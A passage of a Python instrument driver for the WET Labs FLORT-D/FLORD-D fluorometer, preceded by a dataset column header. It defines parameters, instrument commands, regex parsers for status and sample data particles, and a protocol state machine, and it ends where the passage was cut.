code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
#!/usr/bin/env python
# coding=utf-8
"""
@package mi.instrument.wetlabs.fluorometer.flort_d.driver
@file marine-integrations/mi/instrument/wetlabs/fluorometer/flort_d/driver.py
@author Art Teranishi
@brief Driver for the flort_d
Release notes:
Initial development
"""
import datetime
import time
import re
from mi.core.log import get_logger
from mi.core.common import BaseEnum, Units
from mi.core.util import dict_equal
from mi.core.exceptions import SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentCommandException
from mi.core.instrument.instrument_protocol import CommandResponseInstrumentProtocol, InitializationType
from mi.core.instrument.instrument_fsm import InstrumentFSM
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.instrument.data_particle import DataParticle
from mi.core.instrument.data_particle import DataParticleKey
from mi.core.instrument.data_particle import CommonDataParticleType
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility
from mi.core.instrument.protocol_param_dict import ParameterDictType
from mi.core.instrument.driver_dict import DriverDictKey
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.driver_scheduler import TriggerType
from mi.core.time_tools import get_timestamp_delayed
from mi.core.log import get_logging_metaclass
__author__ = 'Rachel Manoni'
__license__ = 'Apache 2.0'
log = get_logger()
NEWLINE = '\r\n'
TIMEOUT = 30
DISCOVER_TIMEOUT = 20
FLORT_CLASS = 'flort'
STATUS_TIMEOUT = 10
SAMPLE_TIMEOUT = 10
###
# Driver Constant Definitions
###
class ParameterUnit(BaseEnum):
COUNTS = 'counts'
TIME_INTERVAL = 'HH:MM:SS'
DATE_INTERVAL = 'MM:DD:YY'
PARTS_PER_MILLION = 'ppm'
MICROGRAMS_PER_LITER = 'µg/L'
PART_PER_METER_STERADIAN = '1/(m • sr)'
class DataParticleType(BaseEnum):
"""
Data particle types produced by this driver
"""
RAW = CommonDataParticleType.RAW
FLORTD_MNU = 'flort_d_status'
FLORDD_MNU = 'flord_d_status'
FLORTD_SAMPLE = 'flort_d_data_record'
FLORDD_SAMPLE = 'flord_d_data_record'
class ProtocolState(BaseEnum):
"""
Instrument protocol states
"""
UNKNOWN = DriverProtocolState.UNKNOWN
COMMAND = DriverProtocolState.COMMAND
AUTOSAMPLE = DriverProtocolState.AUTOSAMPLE
DIRECT_ACCESS = DriverProtocolState.DIRECT_ACCESS
class ProtocolEvent(BaseEnum):
"""
Protocol events
"""
ENTER = DriverEvent.ENTER
EXIT = DriverEvent.EXIT
GET = DriverEvent.GET
SET = DriverEvent.SET
DISCOVER = DriverEvent.DISCOVER
START_DIRECT = DriverEvent.START_DIRECT
STOP_DIRECT = DriverEvent.STOP_DIRECT
START_AUTOSAMPLE = DriverEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = DriverEvent.STOP_AUTOSAMPLE
EXECUTE_DIRECT = DriverEvent.EXECUTE_DIRECT
CLOCK_SYNC = DriverEvent.CLOCK_SYNC
RUN_WIPER = 'PROTOCOL_EVENT_RUN_WIPER'
RUN_WIPER_SCHEDULED = 'PROTOCOL_EVENT_RUN_WIPER_SCHEDULED'
SCHEDULED_CLOCK_SYNC = DriverEvent.SCHEDULED_CLOCK_SYNC
ACQUIRE_SAMPLE = DriverEvent.ACQUIRE_SAMPLE
SCHEDULED_ACQUIRE_STATUS = 'PROTOCOL_EVENT_SCHEDULED_ACQUIRE_STATUS'
ACQUIRE_STATUS = DriverEvent.ACQUIRE_STATUS
class Capability(BaseEnum):
"""
Protocol events that should be exposed to users (subset of above).
"""
RUN_WIPER = ProtocolEvent.RUN_WIPER
CLOCK_SYNC = ProtocolEvent.CLOCK_SYNC
DISCOVER = ProtocolEvent.DISCOVER
ACQUIRE_SAMPLE = ProtocolEvent.ACQUIRE_SAMPLE
START_AUTOSAMPLE = ProtocolEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = ProtocolEvent.STOP_AUTOSAMPLE
START_DIRECT = ProtocolEvent.START_DIRECT
STOP_DIRECT = ProtocolEvent.STOP_DIRECT
ACQUIRE_STATUS = ProtocolEvent.ACQUIRE_STATUS
GET = DriverEvent.GET
SET = DriverEvent.SET
class Parameter(DriverParameter):
"""
Parameters for the dictionary
"""
# Device specific parameters.
MEASUREMENTS_PER_REPORTED = "ave" # Measurements per reported value int
MEASUREMENT_1_DARK_COUNT = "m1d" # Measurement 1 dark count int
MEASUREMENT_1_SLOPE = "m1s" # Measurement 1 slope value float
MEASUREMENT_2_DARK_COUNT = "m2d" # Measurement 2 dark count int
MEASUREMENT_2_SLOPE = "m2s" # Measurement 2 slope value float
MEASUREMENT_3_DARK_COUNT = "m3d" # Measurement 3 dark count int
MEASUREMENT_3_SLOPE = "m3s" # Measurement 3 slope value float
MEASUREMENTS_PER_PACKET = "pkt" # Measurements per packet int
BAUD_RATE = "rat" # Baud rate int
PACKETS_PER_SET = "set" # Packets per set int
PREDEFINED_OUTPUT_SEQ = "seq" # Predefined output sequence int
RECORDING_MODE = "rec" # Recording mode int
MANUAL_MODE = "man" # Manual mode int
SAMPLING_INTERVAL = "int" # Sampling interval str
DATE = "dat" # Date str
TIME = "clk" # Time str
MANUAL_START_TIME = "mst" # Manual start time str
# Hardware Data
SERIAL_NUM = "ser" # Serial number str
FIRMWARE_VERSION = "ver" # Firmware version str
INTERNAL_MEMORY = "mem" # Internal memory int
# Engineering param
RUN_WIPER_INTERVAL = "wiper_interval" # Interval to schedule running wiper str
RUN_CLOCK_SYNC_INTERVAL = 'clk_interval' # Interval to schedule syncing clock str
RUN_ACQUIRE_STATUS_INTERVAL = 'status_interval' # Interval to schedule status str
class ScheduledJob(BaseEnum):
"""
List of jobs to be scheduled
"""
RUN_WIPER = 'run_wiper'
CLOCK_SYNC = 'clock_sync'
ACQUIRE_STATUS = 'acquire_status'
class Prompt(BaseEnum):
"""
Device I/O prompts.
FLORT-D does not have a prompt.
"""
class InstrumentCommand(BaseEnum):
"""
Commands sent to the instrument
"""
# Instrument command strings
INTERRUPT_INSTRUMENT = "!!!!!"
PRINT_METADATA = "$met"
PRINT_MENU = "$mnu"
RUN_SETTINGS = "$run"
RUN_WIPER = "$mvs"
# placeholder for all parameters
SET = 'set'
###############################################################################
# Data Particles
###############################################################################
MNU_REGEX = r"(Ser.*?Mem\s[0-9]{1,6})"
MNU_REGEX_MATCHER = re.compile(MNU_REGEX, re.DOTALL)
RUN_REGEX = r"(mvs\s[0-1]\r\n)"
RUN_REGEX_MATCHER = re.compile(RUN_REGEX, re.DOTALL)
MET_REGEX = r"(Sig_1\S*).*?(Sig_2\S*).*?(Sig_3,counts,,SO,\S*?,\d+)"
MET_REGEX_MATCHER = re.compile(MET_REGEX, re.DOTALL)
TIME_INTERVAL = r"blahblahblahfakeregexdon'tmatchme"
FLORD_SAMPLE_REGEX = r"(\d+/\d+/\d+\s+\d+:\d+:\d+(\s+-?\d+){5}\r\n)"
FLORD_SAMPLE_REGEX_MATCHER = re.compile(FLORD_SAMPLE_REGEX)
FLORT_SAMPLE_REGEX = r"(\d+/\d+/\d+\s+\d+:\d+:\d+(\s+-?\d+){7}\r\n)"
FLORT_SAMPLE_REGEX_MATCHER = re.compile(FLORT_SAMPLE_REGEX)
class FlordMenuParticleKey(BaseEnum):
SERIAL_NUM = "serial_number"
FIRMWARE_VER = "firmware_version"
AVE = "number_measurements_per_reported_value"
PKT = "number_of_reported_values_per_packet"
M1D = "measurement_1_dark_count_value"
M2D = "measurement_2_dark_count_value"
M1S = "measurement_1_slope_value"
M2S = "measurement_2_slope_value"
SEQ = "predefined_output_sequence"
RAT = "baud_rate"
SET = "number_of_packets_per_set"
REC = "recording_mode"
MAN = "manual_mode"
INT = "sampling_interval"
DAT = "date"
CLK = "clock"
MST = "manual_start_time"
MEM = "internal_memory"
class FlortMenuParticleKey(FlordMenuParticleKey):
M3D = "measurement_3_dark_count_value"
M3S = "measurement_3_slope_value"
class FlordMenuParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest comes along for free.
"""
_data_particle_type = DataParticleType.FLORDD_MNU
LINE01 = r"Ser\s*(\S*)"
LINE02 = r"Ver\s*(\S*)"
LINE03 = r"Ave\s*(\S*)"
LINE04 = r"Pkt\s*(\S*)"
LINE05 = r"M1d\s*(\S*)"
LINE06 = r"M2d\s*(\S*)"
LINE08 = r"M1s\s*(\S*)"
LINE09 = r"M2s\s*(\S*)"
LINE11 = r"Seq\s*(\S*)"
LINE12 = r"Rat\s*(\S*)"
LINE13 = r"Set\s*(\S*)"
LINE14 = r"Rec\s*(\S*)"
LINE15 = r"Man\s*(\S*)"
LINE16 = r"Int\s*(\S*)"
LINE17 = r"Dat\s*(\S*)"
LINE18 = r"Clk\s*(\S*)"
LINE19 = r"Mst\s*(\S*)"
LINE20 = r"Mem\s*(\S*)"
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("FlordDMNU raw data = %r", self.raw_data)
try:
serial_num = str(re.compile(self.LINE01).search(self.raw_data).group(1))
firmware_ver = str(re.compile(self.LINE02).search(self.raw_data).group(1))
ave = int(re.compile(self.LINE03).search(self.raw_data).group(1))
pkt = int(re.compile(self.LINE04).search(self.raw_data).group(1))
m1d = int(re.compile(self.LINE05).search(self.raw_data).group(1))
m2d = int(re.compile(self.LINE06).search(self.raw_data).group(1))
m1s = float(re.compile(self.LINE08).search(self.raw_data).group(1))
m2s = float(re.compile(self.LINE09).search(self.raw_data).group(1))
seq = int(re.compile(self.LINE11).search(self.raw_data).group(1))
rat = int(re.compile(self.LINE12).search(self.raw_data).group(1))
setv = int(re.compile(self.LINE13).search(self.raw_data).group(1))
rec = int(re.compile(self.LINE14).search(self.raw_data).group(1))
man = int(re.compile(self.LINE15).search(self.raw_data).group(1))
interval = str(re.compile(self.LINE16).search(self.raw_data).group(1))
dat = str(re.compile(self.LINE17).search(self.raw_data).group(1))
clk = str(re.compile(self.LINE18).search(self.raw_data).group(1))
mst = str(re.compile(self.LINE19).search(self.raw_data).group(1))
mem = int(re.compile(self.LINE20).search(self.raw_data).group(1))
month, day, year = dat.split('/')
hours, mins, seconds = clk.split(':')
try:
dt = datetime.datetime(2000 + int(year), int(month), int(day), int(hours), int(mins), int(seconds))
ntp_ts = (dt - datetime.datetime(1900, 1, 1)).total_seconds()
self.set_internal_timestamp(ntp_ts)
except ValueError:
log.exception('Unable to decode timestamp in FlordDMNU particle')
result = [{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SERIAL_NUM, DataParticleKey.VALUE: serial_num},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.FIRMWARE_VER,
DataParticleKey.VALUE: firmware_ver},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.AVE, DataParticleKey.VALUE: ave},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.PKT, DataParticleKey.VALUE: pkt},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M1D, DataParticleKey.VALUE: m1d},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M2D, DataParticleKey.VALUE: m2d},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M1S, DataParticleKey.VALUE: m1s},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M2S, DataParticleKey.VALUE: m2s},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SEQ, DataParticleKey.VALUE: seq},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.RAT, DataParticleKey.VALUE: rat},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SET, DataParticleKey.VALUE: setv},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.REC, DataParticleKey.VALUE: rec},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MAN, DataParticleKey.VALUE: man},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.INT, DataParticleKey.VALUE: interval},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.DAT, DataParticleKey.VALUE: dat},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.CLK, DataParticleKey.VALUE: clk},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MST, DataParticleKey.VALUE: mst},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MEM, DataParticleKey.VALUE: mem}]
log.debug('FlordDMNU parsed particle = %r', result)
return result
except Exception:
raise SampleException('Error building FlordDMNU_Particle')
class FlortMenuParticle(FlordMenuParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest comes along for free.
"""
_data_particle_type = DataParticleType.FLORTD_MNU
LINE07 = r"M3d\s*(\S*)"
LINE10 = r"M3s\s*(\S*)"
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("FlortDMNU_Particle _build_parsed_values enter...")
log.debug("FlortDMNU raw data = %r", self.raw_data)
try:
result = super(FlortMenuParticle, self)._build_parsed_values()
m3d = int(re.compile(self.LINE07).search(self.raw_data).group(1))
m3s = float(re.compile(self.LINE10).search(self.raw_data).group(1))
result.append({DataParticleKey.VALUE_ID: FlortMenuParticleKey.M3D, DataParticleKey.VALUE: m3d})
result.append({DataParticleKey.VALUE_ID: FlortMenuParticleKey.M3S, DataParticleKey.VALUE: m3s})
log.debug('FlortDMNU parsed particle = %r', result)
return result
except ValueError:
raise SampleException('Error building FlortDMNU_Particle')
class FlordSampleParticleKey(BaseEnum):
date_string = 'date_string'
time_string = 'time_string'
wave_beta = 'measurement_wavelength_beta'
raw_sig_beta = 'raw_signal_beta'
wave_chl = 'measurement_wavelength_chl'
raw_sig_chl = 'raw_signal_chl'
raw_temp = 'raw_internal_temp'
# the following comes from $met command
# since these values will never change, on initialization they are stored and then used for the remainder
SIG_1_SCALE_FACTOR = 'signal_1_scale_factor'
SIG_1_OFFSET = 'signal_1_offset'
SIG_2_SCALE_FACTOR = 'signal_2_scale_factor'
SIG_2_OFFSET = 'signal_2_offset'
class FlortSampleParticleKey(FlordSampleParticleKey):
wave_cdom = 'measurement_wavelength_cdom'
raw_sig_cdom = 'raw_signal_cdom'
# the following comes from $met command
# since these values will never change, on initialization they are stored and then used for the remainder
SIG_3_SCALE_FACTOR = 'signal_3_scale_factor'
SIG_3_OFFSET = 'signal_3_offset'
class FlordSampleParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest should come along for free.
"""
_data_particle_type = DataParticleType.FLORDD_SAMPLE
_compiled_regex = None
sig_1_offset = 0
sig_1_scale = 0
sig_2_offset = 0
sig_2_scale = 0
ntp_epoch = datetime.datetime(1900, 1, 1)
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
if FlordSampleParticle._compiled_regex is None:
FlordSampleParticle._compiled_regex = re.compile(FlordSampleParticle.regex())
return FlordSampleParticle._compiled_regex
@staticmethod
def regex():
"""
Regular expression to match a sample pattern
@return: regex string
"""
return FLORD_SAMPLE_REGEX
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("raw data = %r", self.raw_data)
match = FlordSampleParticle.regex_compiled().search(self.raw_data)
if not match:
raise SampleException("No regex match of parsed sample data: [%s]" % self.raw_data)
try:
split_data = match.group(0).split('\t')
date_str = str(split_data[0])
time_str = str(split_data[1])
wave_beta = int(split_data[2])
raw_sig_beta = int(split_data[3])
wave_chl = int(split_data[4])
raw_sig_chl = int(split_data[5])
raw_temp = int(split_data[6])
month, day, year = date_str.split('/')
hours, mins, secs = time_str.split(':')
month = int(month)
day = int(day)
year = int(year) + 2000
hours = int(hours)
mins = int(mins)
secs = int(secs)
except ValueError:
raise SampleException('FlortDSample_Particle: cannot parse thru data')
record_time = datetime.datetime(year, month, day, hours, mins, secs)
self.set_internal_timestamp(timestamp=(record_time - self.ntp_epoch).total_seconds())
result = [{DataParticleKey.VALUE_ID: FlortSampleParticleKey.date_string, DataParticleKey.VALUE: date_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.time_string, DataParticleKey.VALUE: time_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_beta, DataParticleKey.VALUE: wave_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_beta, DataParticleKey.VALUE: raw_sig_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_chl, DataParticleKey.VALUE: wave_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_chl, DataParticleKey.VALUE: raw_sig_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_temp, DataParticleKey.VALUE: raw_temp},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_scale}]
log.debug('parsed particle = %r', result)
return result
class FlortSampleParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest should come along for free.
"""
_data_particle_type = DataParticleType.FLORTD_SAMPLE
_compiled_regex = None
sig_1_offset = 0
sig_1_scale = 0
sig_2_offset = 0
sig_2_scale = 0
sig_3_offset = 0
sig_3_scale = 0
ntp_epoch = datetime.datetime(1900, 1, 1)
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
if FlortSampleParticle._compiled_regex is None:
FlortSampleParticle._compiled_regex = re.compile(FlortSampleParticle.regex())
return FlortSampleParticle._compiled_regex
@staticmethod
def regex():
"""
Regular expression to match a sample pattern
@return: regex string
"""
return FLORT_SAMPLE_REGEX
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("raw data = %r", self.raw_data)
match = FlortSampleParticle.regex_compiled().search(self.raw_data)
if not match:
raise SampleException("No regex match of parsed sample data: [%s]" % self.raw_data)
try:
split_data = match.group(0).split('\t')
date_str = str(split_data[0])
time_str = str(split_data[1])
wave_beta = int(split_data[2])
raw_sig_beta = int(split_data[3])
wave_chl = int(split_data[4])
raw_sig_chl = int(split_data[5])
wave_cdom = int(split_data[6])
raw_sig_cdom = int(split_data[7])
raw_temp = int(split_data[8])
month, day, year = date_str.split('/')
hours, mins, secs = time_str.split(':')
month = int(month)
day = int(day)
year = int(year) + 2000
hours = int(hours)
mins = int(mins)
secs = int(secs)
except Exception:
raise SampleException('FlortDSample_Particle: cannot parse thru data')
record_time = datetime.datetime(year, month, day, hours, mins, secs)
self.set_internal_timestamp(timestamp=(record_time - self.ntp_epoch).total_seconds())
result = [{DataParticleKey.VALUE_ID: FlortSampleParticleKey.date_string, DataParticleKey.VALUE: date_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.time_string, DataParticleKey.VALUE: time_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_beta, DataParticleKey.VALUE: wave_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_beta, DataParticleKey.VALUE: raw_sig_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_chl, DataParticleKey.VALUE: wave_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_chl, DataParticleKey.VALUE: raw_sig_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_cdom, DataParticleKey.VALUE: wave_cdom},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_cdom, DataParticleKey.VALUE: raw_sig_cdom},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_temp, DataParticleKey.VALUE: raw_temp},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_3_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_3_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_3_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_3_scale}]
log.debug('parsed particle = %r', result)
return result
###############################################################################
# Driver
###############################################################################
class InstrumentDriver(SingleConnectionInstrumentDriver):
"""
InstrumentDriver subclass
Subclasses SingleConnectionInstrumentDriver with connection state
machine.
"""
########################################################################
# Superclass overrides for resource query.
########################################################################
@staticmethod
def get_resource_params():
"""
Return list of device parameters available.
"""
return Parameter.list()
########################################################################
# Protocol builder.
########################################################################
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)
###########################################################################
# Protocol
###########################################################################
# noinspection PyUnusedLocal
class Protocol(CommandResponseInstrumentProtocol):
"""
Instrument protocol class
Subclasses CommandResponseInstrumentProtocol
"""
__instrument_class__ = FLORT_CLASS
__metaclass__ = get_logging_metaclass(log_level='debug')
def __init__(self, prompts, newline, driver_event):
"""
Protocol constructor.
@param prompts A BaseEnum class containing instrument prompts.
@param newline The newline.
@param driver_event Driver process event callback.
"""
# Construct protocol superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
# Build protocol state machine.
self._protocol_fsm = InstrumentFSM(ProtocolState, ProtocolEvent,
ProtocolEvent.ENTER, ProtocolEvent.EXIT)
# Add event handlers for protocol state machine.
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.ENTER, self._handler_unknown_enter)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.EXIT, self._handler_unknown_exit)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.DISCOVER, self._handler_unknown_discover)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ENTER, self._handler_command_enter)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.EXIT, self._handler_command_exit)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_DIRECT,
self._handler_command_start_direct)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.GET, self._handler_command_get)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET, self._handler_command_set)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_AUTOSAMPLE,
self._handler_command_start_autosample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_STATUS,
self._handler_command_acquire_status)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.RUN_WIPER, self._handler_command_run_wiper)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.CLOCK_SYNC,
self._handler_command_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_SAMPLE,
self._handler_command_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ENTER, self._handler_autosample_enter)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.EXIT, self._handler_autosample_exit)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.STOP_AUTOSAMPLE,
self._handler_autosample_stop_autosample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.RUN_WIPER_SCHEDULED,
self._handler_autosample_run_wiper)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.SCHEDULED_CLOCK_SYNC,
self._handler_autosample_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.SCHEDULED_ACQUIRE_STATUS,
self._handler_autosample_acquire_status)
# GET is only used for configuring the driver when it discovers that it is in AUTOSAMPLE
# will not be shown on the State Diagram
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.GET, self._handler_command_get)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.ENTER,
self._handler_direct_access_enter)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXIT,
self._handler_direct_access_exit)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.STOP_DIRECT,
self._handler_direct_access_stop_direct)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXECUTE_DIRECT,
self._handler_direct_access_execute_direct)
# Construct the parameter dictionary containing device parameters,
# current parameter values, and set formatting functions.
self._build_param_dict()
self._build_command_dict()
self._build_driver_dict()
# Add build handlers for device commands.
self._add_build_handler(InstrumentCommand.INTERRUPT_INSTRUMENT, self._build_no_eol_command)
self._add_build_handler(InstrumentCommand.SET, self._build_single_parameter_command)
self._add_build_handler(InstrumentCommand.RUN_SETTINGS, self._build_simple_command)
self._add_build_handler(InstrumentCommand.PRINT_METADATA, self._build_simple_command)
self._add_build_handler(InstrumentCommand.PRINT_MENU, self._build_simple_command)
self._add_build_handler(InstrumentCommand.RUN_WIPER, self._build_simple_command)
# all commands return a 'unrecognized command' if not recognized by the instrument
self._add_response_handler(InstrumentCommand.INTERRUPT_INSTRUMENT, self._parse_command_response)
self._add_response_handler(InstrumentCommand.SET, self._parse_command_response)
self._add_response_handler(InstrumentCommand.RUN_SETTINGS, self._parse_command_response)
self._add_response_handler(InstrumentCommand.PRINT_METADATA, self._parse_metadata_response)
self._add_response_handler(InstrumentCommand.PRINT_MENU, self._parse_command_response)
self._add_response_handler(InstrumentCommand.RUN_WIPER, self._parse_run_wiper_response)
# commands sent to device to be filtered in responses for telnet DA
self._sent_cmds = []
self._chunker = StringChunker(Protocol.sieve_function)
# State state machine in UNKNOWN state.
self._protocol_fsm.start(ProtocolState.UNKNOWN)
self.initialize_scheduler()
@staticmethod
def sieve_function(raw_data):
"""
The method that splits samples
:param raw_data:
"""
return_list = []
sieve_match = [MNU_REGEX_MATCHER,
RUN_REGEX_MATCHER,
MET_REGEX_MATCHER,
FLORD_SAMPLE_REGEX_MATCHER,
FLORT_SAMPLE_REGEX_MATCHER]
for matcher in sieve_match:
for match in matcher.finditer(raw_data):
return_list.append((match.start(), match.end()))
return return_list
def _filter_capabilities(self, events):
"""
Return a list of currently available capabilities.
"""
return [x for x in events if Capability.has(x)]
@staticmethod
def _parse_command_response(response, prompt):
"""
Instrument will send an 'unrecognized command' response if
an error occurred while sending a command.
Raise an exception if this occurs.
"""
if 'unrecognized command' in response:
raise InstrumentCommandException('unrecognized command')
return response
@staticmethod
def _parse_run_wiper_response(response, prompt):
"""
After running wiper command, the instrument will send an 'unrecognized command' if the command
was not received correctly. Instrument will send a 'mvs 0' if the wiper does not complete
its action. Raise an exception if either occurs.
"""
if 'unrecognized command' in response:
raise InstrumentCommandException('unrecognized command')
if '0' in response:
raise InstrumentCommandException('run wiper was not successful')
return response
@staticmethod
def _parse_metadata_response(response, prompt):
match = MET_REGEX_MATCHER.search(response)
if not match:
raise SampleException("No regex match of metadata data: [%r]" %
response)
try:
sig_1_data = match.group(1)
data = sig_1_data.split(',')
FlortSampleParticle.sig_1_offset = int(data[5])
FlortSampleParticle.sig_1_scale = float(data[4])
sig_2_data = match.group(2)
data = sig_2_data.split(',')
FlortSampleParticle.sig_2_offset = int(data[5])
FlortSampleParticle.sig_2_scale = float(data[4])
sig_3_data = match.group(3)
data = sig_3_data.split(',')
FlortSampleParticle.sig_3_offset = int(data[5])
FlortSampleParticle.sig_3_scale = float(data[4])
except Exception:
raise SampleException('Error parsing particle FlortDMET_Particle')
return response
########################################################################
# Unknown handlers.
########################################################################
def _handler_unknown_enter(self, *args, **kwargs):
"""
Entering Unknown state
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
@staticmethod
def _handler_unknown_exit(*args, **kwargs):
"""
Exiting Unknown state
"""
pass
def _handler_unknown_discover(self, *args, **kwargs):
"""
Discover current state
"""
next_state = DriverProtocolState.COMMAND
response = []
sample = DataParticleType.FLORDD_SAMPLE
if self.__instrument_class__ == FLORT_CLASS:
sample = DataParticleType.FLORTD_SAMPLE
particles = self.wait_for_particles([sample], timeout=time.time()+DISCOVER_TIMEOUT)
if particles:
next_state = DriverProtocolState.AUTOSAMPLE
return next_state, (next_state, response)
########################################################################
# Command handlers.
########################################################################
def _handler_command_enter(self, *args, **kwargs):
"""
Enter command state. Update the param dictionary.
